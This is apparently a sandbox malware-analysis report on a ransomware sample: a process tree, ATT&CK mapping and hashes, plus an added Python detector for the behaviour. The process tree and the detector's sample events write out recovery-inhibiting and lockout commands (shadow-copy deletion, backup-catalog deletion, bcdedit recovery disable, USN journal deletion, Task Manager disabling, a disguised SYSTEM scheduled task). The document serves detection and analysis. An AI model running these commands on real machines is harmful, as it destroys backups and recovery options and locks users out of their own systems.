C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:112
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:5388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1548
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5268
-
-
-
C:\Windows\System32\cmd.exe (depth 2, PID 5056)
  "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe" /F

C:\Windows\system32\schtasks.exe (depth 3, PID 5260)
  SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe" /F
  - Creates scheduled task(s)
C:\Windows\System32\cmd.exe (depth 2, PID 2840)
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\system32\vssadmin.exe (depth 3, PID 5936)
  vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  - Enumerates connected drives
  - Interacts with shadow copies

C:\Windows\System32\cmd.exe (depth 2, PID 2656)
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\system32\vssadmin.exe (depth 3, PID 6052)
  vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  - Enumerates connected drives
  - Interacts with shadow copies

C:\Windows\System32\cmd.exe (depth 2, PID 4208)
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\system32\vssadmin.exe (depth 3, PID 2532)
  vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  - Interacts with shadow copies

C:\Windows\System32\cmd.exe (depth 2, PID 1824)
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe (depth 3, PID 220)
  vssadmin.exe Delete Shadows /all /quiet
  - Interacts with shadow copies

C:\Windows\System32\cmd.exe (depth 2, PID 2356)
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\system32\vssadmin.exe (depth 3, PID 5360)
  vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  - Interacts with shadow copies
C:\Windows\System32\cmd.exe (depth 2, PID 4796)
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\bcdedit.exe (depth 3, PID 3396)
  bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  - Modifies boot configuration data using bcdedit

C:\Windows\System32\cmd.exe (depth 2, PID 4640)
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\schtasks.exe (depth 3, PID 3152)
  schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\System32\cmd.exe (depth 2, PID 3360)
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\system32\wbadmin.exe (depth 3, PID 3488)
  wbadmin.exe delete catalog -quiet
  - Deletes backup catalog

C:\Windows\System32\cmd.exe (depth 2, PID 4880)
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\system32\fsutil.exe (depth 3, PID 5896)
  fsutil.exe usn deletejournal /D C:
  - Deletes NTFS Change Journal

C:\Windows\System32\cmd.exe (depth 2, PID 5092)
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe (depth 3, PID 5772)
  bcdedit /set {default} recoveryenabled No
  - Modifies boot configuration data using bcdedit
C:\Windows\system32\vssvc.exe (depth 1, PID 5464)
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\wbengine.exe (depth 1, PID 6080)
  "C:\Windows\system32\wbengine.exe"
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\vdsldr.exe (depth 1, PID 5244)
  C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe (depth 1, PID 3988)
  C:\Windows\System32\vds.exe
  - Checks SCSI registry key(s)
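The process tree above is the usual pre-encryption playbook: neuter Defender through policy keys, lock the interactive user out of Task Manager, Run, log-off and workstation lock, remove every local recovery path (shadow copies, backup catalog, System Restore, WinRE, boot recovery, the USN journal) and persist as SYSTEM via a scheduled task. The following Python is an added example, not part of the tria.ge report or of the sample, showing how to flag that sequence from process-creation telemetry; it assumes the Image and CommandLine fields of a Sysmon Event ID 1 or Security 4688 record. The sample events are constructed from the command lines above (with the dropper path shortened) plus one benign reg add as a control. The category names and the verdict threshold are my own choices, and the rules generalise past this sample: any policy write under the Windows Defender policy key fires, not only the value names seen here.

```python
"""Flag the defense-impairment / recovery-inhibition sequence from the process
tree above in process-creation events (Image + CommandLine, as in Sysmon Event
ID 1 or Security 4688).  Added example, not part of the tria.ge report."""
import re
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample events modelled on the report's command lines (dropper
# path shortened); the last entry is a benign control that must not fire.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\system32\reg.exe",
     r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f'),
    (r"C:\Windows\system32\reg.exe",
     r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f'),
    (r"C:\Windows\system32\reg.exe",
     r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f'),
    (r"C:\Windows\system32\reg.exe",
     r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f'),
    (r"C:\Windows\system32\schtasks.exe",
     r'SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\sample.exe" /F'),
    (r"C:\Windows\system32\vssadmin.exe", r"vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB"),
    (r"C:\Windows\system32\vssadmin.exe", r"vssadmin.exe Delete Shadows /all /quiet"),
    (r"C:\Windows\system32\bcdedit.exe", r"bcdedit /set {default} recoveryenabled No"),
    (r"C:\Windows\system32\schtasks.exe", r'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable'),
    (r"C:\Windows\system32\wbadmin.exe", r"wbadmin.exe delete catalog -quiet"),
    (r"C:\Windows\system32\fsutil.exe", r"fsutil.exe usn deletejournal /D C:"),
    (r"C:\Windows\system32\reg.exe", r'reg add "HKEY_CURRENT_USER\Software\ExampleApp" /v "Theme" /t REG_DWORD /d 1 /f'),
]

HIVES = {"hkey_local_machine": "hklm", "hkey_current_user": "hkcu"}

# (fragment of the normalised key, allowed value names or None for any, category, label)
REG_RULES = [
    ("\\policies\\microsoft\\windows defender\\", None, "defender_tamper", "Defender policy written"),
    ("\\policies\\microsoft\\windows nt\\systemrestore", None, "recovery_inhibit", "System Restore policy"),
    ("\\policies\\microsoft\\windows\\winre", None, "recovery_inhibit", "WinRE policy"),
    ("\\policies\\microsoft\\windows\\backup\\client", None, "recovery_inhibit", "Windows Backup policy"),
    ("\\currentversion\\policies\\system",
     {"disabletaskmgr", "disablelockworkstation", "disablechangepassword", "nologoff"}, "ui_lockout", "user lockout policy"),
    ("\\currentversion\\policies\\explorer", {"noclose", "norun", "startmenulogoff"}, "ui_lockout", "user lockout policy"),
]

# (image basename, regex over the lower-cased command line, category, label)
CMD_RULES = [
    ("vssadmin.exe", r"\bdelete\s+shadows\b", "recovery_inhibit", "shadow copies deleted"),
    ("vssadmin.exe", r"\bresize\s+shadowstorage\b", "recovery_inhibit", "shadow storage resized (evicts existing copies)"),
    ("wbadmin.exe", r"\bdelete\s+catalog\b", "recovery_inhibit", "backup catalog deleted"),
    ("bcdedit.exe", r"\brecoveryenabled\s+no\b|\bbootstatuspolicy\s+ignoreallfailures\b", "recovery_inhibit", "boot recovery disabled"),
    ("fsutil.exe", r"\busn\s+deletejournal\b", "indicator_removal", "NTFS change journal deleted"),
    ("schtasks.exe", r'/create\b.*/ru\s+"?nt authority\\system', "persistence", "scheduled task created as SYSTEM"),
    ("schtasks.exe", r"/change\b.*systemrestore\\sr.*/disable\b", "recovery_inhibit", "System Restore task disabled"),
]


def tokenize(cmdline: str) -> List[str]:
    """Split on whitespace, keeping double-quoted spans as one token.  Backslashes
    stay literal (Windows paths), which shlex in POSIX mode would mangle."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def normalize_key(key: str) -> str:
    """Lower-case the path and fold HKEY_* hive names to their short forms."""
    hive, _, rest = key.partition("\\")
    return HIVES.get(hive.lower(), hive.lower()) + "\\" + rest.lower()


def parse_reg_add(cmdline: str) -> Optional[Dict[str, str]]:
    """Extract key / value name / type / data from 'reg add <key> /v .. /t .. /d .. [/f]'."""
    toks = tokenize(cmdline)
    if len(toks) < 3 or toks[1].lower() != "add":
        return None
    info = {"key": normalize_key(toks[2]), "value": "", "type": "", "data": ""}
    fields = {"/v": "value", "/t": "type", "/d": "data"}
    i = 3
    while i < len(toks):
        field = fields.get(toks[i].lower())
        if field and i + 1 < len(toks):
            info[field] = toks[i + 1]
            i += 2
        else:
            i += 1
    return info


def inspect_event(image: str, cmdline: str) -> Optional[Dict[str, str]]:
    """Return a finding for one process-creation event, or None when nothing matches."""
    exe = image.lower().rsplit("\\", 1)[-1]
    if exe == "reg.exe":
        info = parse_reg_add(cmdline)
        if info is None:
            return None
        for fragment, names, category, label in REG_RULES:
            if fragment in info["key"] and (names is None or info["value"].lower() in names):
                return {"category": category, "cmdline": cmdline,
                        "label": f"{label}: {info['value']}={info['data']}"}
        return None
    low = cmdline.lower()
    for rule_exe, pattern, category, label in CMD_RULES:
        if exe == rule_exe and re.search(pattern, low):
            return {"category": category, "cmdline": cmdline, "label": label}
    return None


def scan(events: List[Tuple[str, str]]) -> List[Dict[str, str]]:
    return [f for f in (inspect_event(img, cmd) for img, cmd in events) if f]


def verdict(findings: List[Dict[str, str]]) -> str:
    """Recovery inhibition plus two other behaviour classes is the ransomware
    signature; an isolated hit is only 'suspicious' (admins do run vssadmin)."""
    cats: Set[str] = {f["category"] for f in findings}
    if "recovery_inhibit" in cats and len(cats) >= 3:
        return "ransomware-preparation"
    return "suspicious" if cats else "clean"


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for hit in hits:
        print(f"[{hit['category']}] {hit['label']}")
    print("verdict:", verdict(hits))
```

Feed real events by replacing SAMPLE_EVENTS with (Image, CommandLine) pairs from your log pipeline; the parent cmd.exe wrappers in the tree above are ignored on purpose, since matching on the child image avoids double counting and survives a sample that calls the tools directly.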
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Impair Defenses (2): Disable or Modify Tools (2)
- Indicator Removal (3): File Deletion (3)
- Modify Registry (4)
Downloads
- Filesize: 1KB
  MD5: a73f04f78be621902635dfd609e3f0dd
  SHA1: 33a0fba6f89dc652618f8c9b76f7b46877e37381
  SHA256: b9ef1518e77c4e4e726228ada04d088bee61ca546fca53ac9d917ec34cf0627c
  SHA512: ffe3521b40a8c53e794faf4f4530faa8f32cc85e562e65568d045d1c02707f98cf5029e872975beb1c4770e4c3d67ab27ecfadc43bd7d2dd83fb10259aae8b5f

- Filesize: 12KB
  MD5: 4c1b77ea869b2dcd984f7bc60fd6c8bc
  SHA1: ded2674e1be0ea51e16952f910ca8cb51955efdb
  SHA256: 031494c8c724bdff4d8d0ba3906474f6eb0689d6a2f60968f6ef024c9de9d406
  SHA512: 36ba1c022649c9955ac51080a57cb7ecd86ef72413b35b979881700cb8527a5a7806fc7d93db31cbafd5473a2fe2f277b018b60f4e4074db7a5b6717cf141ba0

- Filesize: 684B
  MD5: e4469e166c79b3c45b89a68447d51f79
  SHA1: 43d1e6c60c5de61299f7e91312dcf01fce02f4d0
  SHA256: 77439477fb1298b17dbbf694582b289159be987df9d6fd980ab4728812640dca
  SHA512: 957afa91bace522e7694e941066a9606084263c7a4306a5d52c7e56dd3dba142f75995356ad6bea1f617f609e01f32cf0d1fb846f1e2c660f71d17a0156a4d67